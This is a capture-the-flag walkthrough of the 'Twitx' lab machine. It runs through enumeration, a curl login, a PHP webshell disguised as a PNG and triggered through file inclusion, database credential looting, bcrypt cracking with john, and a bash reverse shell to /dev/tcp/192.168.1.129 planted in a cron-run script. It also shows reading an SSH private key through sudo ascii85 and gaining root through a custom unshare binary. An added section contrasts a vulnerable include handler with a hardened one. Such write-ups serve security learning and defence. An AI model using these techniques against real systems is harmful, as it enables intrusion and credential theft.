# Lab setup
Download: Twitx
Network: NAT, IP: 192.168.1.128
# Penetration process
# Initial information gathering
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 bc:cd:ce:6e:98:09:e5:60:d2:f3:96:74:eb:3f:cc:e3 (ECDSA)
|_  256 b0:38:0c:1c:76:d0:de:64:0a:c4:07:89:4b:71:69:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.59 (Debian)
```
```
http://192.168.1.128/info.php
http://192.168.1.128/note
```
Recuerda contratar certificado del dominio twitx.nyx para el lanzamiento.
Remember to purchase a certificate for the domain twitx.nyx for the launch.
Add the domain to the hosts file.
```
┌──(root㉿kali)-[~/Desktop]
└─# gobuster dir -u http://twitx.nyx/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://twitx.nyx/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 274]
/index.php            (Status: 200) [Size: 33241]
/user                 (Status: 301) [Size: 305] [--> http://twitx.nyx/user/]
/.html                (Status: 403) [Size: 274]
/assets               (Status: 301) [Size: 307] [--> http://twitx.nyx/assets/]
/upload               (Status: 301) [Size: 307] [--> http://twitx.nyx/upload/]
/css                  (Status: 301) [Size: 304] [--> http://twitx.nyx/css/]
/includes             (Status: 301) [Size: 309] [--> http://twitx.nyx/includes/]
/js                   (Status: 301) [Size: 303] [--> http://twitx.nyx/js/]
/private.php          (Status: 302) [Size: 0] [--> /?error=Zona+privada#registrate]
/javascript           (Status: 301) [Size: 311] [--> http://twitx.nyx/javascript/]
/.php                 (Status: 403) [Size: 274]
/.html                (Status: 403) [Size: 274]
/server-status        (Status: 403) [Size: 274]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
```
Visiting http://twitx.nyx/private.php shows a registration form with a file upload.
Looking at the page source, there is a hint on line 527; after URL decoding it reads as follows:
```html
<form method="post" action="?i">
    <div class="mb-4 row">
        <div class="form-floating mb-3">
            <input class="form-control" id="email" type="email" name="email"
                required="required" />
            <label for="email">Email </label>
        </div>
        <!-- Password number input-->
        <div class="form-floating mb-3">
            <input class="form-control" id="password" type="password" name="password"
                required="required" />
            <label for="password">Contraseña</label>
        </div>
    </div>
    <button class="btn btn-secondary me-5">
        <i class="fa-solid fa-right-to-bracket me-2"></i>Log-in
    </button>
    <button class="btn btn-primary" type="button" data-bs-dismiss="modal">
        <i class="fas fa-xmark fa-fw"></i>
        Cerrar
    </button>
</form>
```
This is a hidden login form. We first register an account, then send the login request directly:
```
┌──(root㉿kali)-[~]
└─# curl -i -X POST --data 'email=123%40123.com&password=12345678' 'http://twitx.nyx/?i'
HTTP/1.1 302 Found
Date: Fri, 07 Jun 2024 21:42:49 GMT
Server: Apache/2.4.59 (Debian)
Set-Cookie: PHPSESSID=cncdd6f7nb5efvcqlfipknm9bd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ?success=Usuario+validado+correctamente.#registrate
Set-Cookie: PHPSESSID=cei810vp09qe21mes697253uum; path=/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
```
This gives us the post-login redirect location and a PHPSESSID. Set that cookie in the browser, refresh, and we are logged in.
We can now see the path of the image uploaded earlier, but only PNG images could be uploaded.
The file is uploaded during registration, and after logging in we can see its path. Requesting it directly does not get it parsed as PHP, but from the profile page and the directory scan above we can tell there is a user directory.
Visiting http://twitx.nyx/user/profile.php
confirms this, so we can build a path and have the image included.
During registration, upload a PHP webshell with a .png extension. Use the curl request above to obtain the logged-in session ID, set it in the browser, open the profile and note the PNG's path.
Combine the two and visit the URL to trigger it: http://twitx.nyx/private.php?folder=upload&file=152124645266638af1e4b0d9.39084780.png
This gives a shell.
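As an added defensive example (not the Twitx lab's own code), the include pattern that the trigger URL above implies, beside a hardened handler. The original private.php source is not shown in the write-up, so the vulnerable function is an assumed reconstruction, and the web root /var/www/twitx.nyx is taken from the config.php path mentioned later.

```php
<?php
// Added example, not the Twitx lab's own code. The original private.php is
// not shown in the write-up, so the vulnerable handler is an assumed
// reconstruction of what the trigger URL (?folder=...&file=...) implies.

// Assumed vulnerable pattern: request input reaches include(), so an
// uploaded "shell.png" is executed as PHP no matter what its extension is.
function serve_file_vulnerable(array $get): void
{
    include $get['folder'] . '/' . $get['file'];
}

// Hardened handler: fixed base directory, allow-listed folders, a strict
// file-name pattern, realpath confinement, a real PNG check, and readfile()
// instead of include() so the bytes are never interpreted as PHP.
const UPLOAD_BASE = '/var/www/twitx.nyx';               // web root (assumed)
const ALLOWED_FOLDERS = ['upload' => 'upload', 'assets' => 'assets'];

function serve_file_hardened(array $get): void
{
    $folder = $get['folder'] ?? '';
    $file   = $get['file'] ?? '';

    // 1. Folder must be one of ours; never use the raw parameter in a path.
    if (!isset(ALLOWED_FOLDERS[$folder])) {
        http_response_code(400); exit('bad folder');
    }
    // 2. Name pattern: letters, digits and dots, ending in .png. This rejects
    //    "../" and matches what the avatar names in the users table look like.
    if (!preg_match('/\A[A-Za-z0-9.]{1,80}\.png\z/', $file)) {
        http_response_code(400); exit('bad file name');
    }
    // 3. Resolve and confirm the result is still under the base directory.
    $base = realpath(UPLOAD_BASE . '/' . ALLOWED_FOLDERS[$folder]);
    $path = $base === false ? false : realpath($base . '/' . $file);
    if ($path === false || strpos($path, $base . '/') !== 0) {
        http_response_code(404); exit('not found');
    }
    // 4. Check the content, not just the extension.
    $info = @getimagesize($path);
    if ($info === false || $info[2] !== IMAGETYPE_PNG) {
        http_response_code(415); exit('not a png');
    }
    // 5. Stream the bytes; include()/require() would execute embedded PHP.
    header('Content-Type: image/png');
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```

The same getimagesize() check belongs in the registration upload handler; with readfile() in place, even a PNG that carries PHP text is only ever sent as bytes.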
# Privilege escalation
Under the web root, /var/www/twitx.nyx/includes/config.php
stores database credentials:
```php
$dbHost = 'localhost';
$dbUser = 'twitxdbusr';
$dbPassword = '3GcxHeSqbgf1kfj';
$dbDatabase = 'twitxdb';
```
Let's look inside the database:
```
www-data@twitx:/var/www/twitx.nyx/includes$ mysql -u twitxdbusr -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| twitxdb            |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use twitxdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [twitxdb]> show tables;
+-------------------+
| Tables_in_twitxdb |
+-------------------+
| users             |
+-------------------+
1 row in set (0.000 sec)
MariaDB [twitxdb]> select * from users;
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+
| id | nombre | email                    | password                                                     | avatar                                | role |
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+
|  1 | Lenam  | [email protected]        | $2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm |                                       | adm  |
|  2 | 123    | 123@123.com              | $2y$10$nM/m5idaaJoGXk.12HhFDeQdu2fYbMNaN9sFyCWAyycFIzX7RA1ne | 30710014266637852db6459.26073065.png  | usr  |
|  3 | 2222   | 2222@222.com             | $2y$10$1mO34Ve6b76E2Biqalg/..cwfTKn.8cHuMywnKcxpw5E2oiKNzkGS | 1320458475666380f4701ff3.05570504.png | usr  |
|  4 | 111    | 111@111.com              | $2y$10$kH5/MHOtMH25pgXZU6QvoOBJBuNJe0iC7AEEE7fFHix9KidQXAtNe | 16238279576663888a01e193.62033086.png | usr  |
|  5 | 1111   | 1111@1111.com            | $2y$10$hFHKmlMguBsQUDhiHL9/Y.7PYbdgoOHkeAql98mCfo.IQlLcS.ZEC | 152124645266638af1e4b0d9.39084780.png | usr  |
|  6 | 666    | 666@666.com              | $2y$10$KNh0gBRRw7MDLPNliUxmoupnwka8pWmUmZNFf4MSw6uXgySGBt8Ti | 128460101166638d442c1e62.12431542.png | usr  |
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+
6 rows in set (0.000 sec)
```
Let's crack the first password.
First identify the hash type on hashes.com: it is bcrypt.
```
┌──(root㉿kali)-[~]
└─# echo '$2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm' > hash
┌──(root㉿kali)-[~]
└─# john hash --wordlist /usr/share/wordlists/rockyou.txt --format=bcrypt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
patricia         (?)
1g 0:00:00:10 DONE (2024-06-07 11:06) 0.09842g/s 99.21p/s 99.21c/s 99.21C/s molly1..petey
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
This gives the password: patricia
su with it does not work, so we need another approach.
Upload pspy and watch the process list: there is a scheduled task that runs /var/www/twitx.nyx/includes/taak.php.
Write a reverse shell into it: `system("bash -c 'bash -i >& /dev/tcp/192.168.1.129/6666 0>&1'");`
This gives a shell as the timer user.
```
timer@twitx:~$ sudo ascii85 "/home/lenam/.ssh/id_rsa" | ascii85 --decode
```
This prints lenam's SSH private key. Log in with ssh; the key's passphrase is patricia, obtained earlier.
In the home directory there is a folder look\inside
containing an executable named unshare.
Run ./unshare -h
It appears to accept a uid and enter the directory as that uid.
So set it to 0: ./unshare -S 0
This gives a root shell.